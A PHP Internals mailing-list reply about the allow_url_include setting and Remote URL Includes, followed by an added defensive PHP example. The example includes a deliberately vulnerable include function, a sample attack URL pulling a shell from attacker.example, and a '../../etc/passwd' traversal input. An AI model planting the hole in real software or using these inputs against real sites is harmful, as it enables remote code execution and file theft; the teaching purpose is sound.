Stefan Esser wrote:
> It is very good that bugs in PHP Applications are bad for PHP's image.
> The majority of servers get hacked because of Remote URL Includes (and
> not by XSS/SQL Injection). The existence of Remote URL Includes is fully
> to blame on the PHP engine and is UNIQUE. After years the feature is
> still not kicked out of PHP. In PHP 5.2.1 there will be a configuration
> option that activates an (incomplete) blacklist. Everyone should know by
> now that blacklists are BAD.

I am not sure I would call it a blacklist.  It is a flag in the streams
layer that marks stream handlers that could possibly make a network
connection as such and there are only a finite set of stream handlers.
Assuming we have marked the right streams, which I think we have at this
point, the only way to trick it would be to bounce through some sort of
file system network mechanism like auto-mounted file systems or perhaps
some \\Server\path\foo.php thing on Windows, but at that level I think
it is up to the local sysadmin to make sure the PHP scripts can't get to
something they shouldn't.

-Rasmus

-- 
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
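The mechanism Rasmus describes, as an added example that is not part of the thread and not PHP's own engine code: the classic Remote URL Include pattern, a report of which registered stream wrappers are the "could make a network connection" ones the thread is about, the php.ini setting that gates them, and an allowlist-based include that does not depend on the setting at all. The script name `page.php`, the `page` query parameter, the allowlist entries, and the function names are assumptions made for illustration.

```php
<?php
// Added example, not from the mailing-list thread or from PHP itself.

// --- 1. The vulnerable pattern -----------------------------------------
// Called as page.php?page=about. With allow_url_include=On (how every
// PHP before 5.2.1 behaved whenever allow_url_fopen was on),
// ?page=http://attacker.example/shell.txt? fetches and executes remote
// code; the trailing '?' turns the appended ".php" into a query string.
function vulnerable_include(string $page): void
{
    include $page . '.php';   // DO NOT DO THIS: $page is attacker-controlled
}

// --- 2. What the streams-layer flag covers -----------------------------
// Rasmus' point: allow_url_include is not a string blacklist. Each
// registered stream wrapper carries a flag saying whether it may open a
// network connection, and include/require refuses flagged wrappers when
// the setting is Off. This lists the registered wrappers and marks the
// four remote-fetching ones the thread is about. (In current PHP the
// data: wrapper and php://input are gated by the same setting; that is
// outside the thread and noted here as background, not as its claim.)
function report_wrappers(): array
{
    $remote = ['http', 'https', 'ftp', 'ftps'];
    $out = [];
    foreach (stream_get_wrappers() as $w) {
        $out[$w] = in_array($w, $remote, true) ? 'remote-capable' : 'local/other';
    }
    return $out;
}

// --- 3. The configuration knob -----------------------------------------
// allow_url_include is PHP_INI_SYSTEM: it can only be set in php.ini or the
// web server config, never with ini_set(), so a script can only read it.
//
//   ; php.ini, weak setting:        ; php.ini, corrected (the 5.2.1 default):
//   allow_url_include = On          allow_url_include = Off
//   allow_url_fopen   = On          allow_url_fopen   = Off   ; if nothing needs it
function include_hardening_status(): array
{
    return [
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
    ];
}

// --- 4. An include that needs neither setting to be safe -----------------
// An explicit allowlist means the request can never carry a scheme, a
// drive letter, a UNC prefix or "..". The realpath() containment check is
// belt and braces for the cases Rasmus hands to the sysadmin: it refuses a
// file that resolves (via symlink or automount) outside $baseDir even if
// the allowlist was edited carelessly. Returns false instead of including
// anything when the request is rejected.
function safe_include(string $page, string $baseDir): bool
{
    $allowed = ['home', 'about', 'contact'];         // assumed page names
    if (!in_array($page, $allowed, true)) {
        return false;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return false;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;                                 // resolved outside the tree
    }
    include $path;
    return true;
}

// Usage from the command line (assumed layout: this file and the page files
// such as about.php live in the same directory).
if (PHP_SAPI === 'cli') {
    print_r(report_wrappers());
    print_r(include_hardening_status());
    var_dump(safe_include($argv[1] ?? 'about', __DIR__));
}
```

Running `php page.php 'http://attacker.example/shell.txt?'` or `php page.php '../../etc/passwd'` makes `safe_include()` return false before any wrapper is consulted, which is the property the thread wants: the application never hands a user-controlled string to the streams layer, so whether the engine's wrapper flag is complete, and whether the host exposes UNC or automounted paths, no longer decides whether remote code runs.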